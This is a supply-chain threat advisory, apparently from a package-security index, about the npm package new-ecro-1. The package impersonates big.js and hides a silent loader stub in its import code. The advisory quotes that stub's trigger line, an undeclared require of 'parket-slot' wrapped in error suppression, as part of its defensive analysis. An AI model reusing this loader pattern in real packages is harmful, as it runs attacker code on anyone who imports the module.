Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in new-ecro-1 (npm)

new-ecro-1

Risk score

92

AI summary

Indexed incident for new-ecro-1 (npm).

Description

Package new-ecro-1 impersonates the legitimate big.js library by shipping its source verbatim (banner, license, and homepage pointing at MikeMcl/big.js). Inside the load-time IIFE in both big.js and big.mjs at line 606, an injected block silently executes const doc = require("parket-slot"); doc.from_str().then(e => {}).catch(e => {}), wrapped in a try/catch that swallows all errors. The parket-slot package is not declared in this manifest's dependencies (which instead lists new-solt-1), so the require resolves to whatever loader-controlled package happens to be present in the surrounding install tree, executing its from_str() on import. The combination of name-impersonation, undeclared cross-package require, and silent error suppression is a loader stub for attacker-controlled code that runs the moment any consumer imports this module.

Technical details

Affected versions

  • =0.3.9
  • =0.1.9

Indicators

  • affected version =0.3.9 (75%)
  • affected version =0.1.9 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
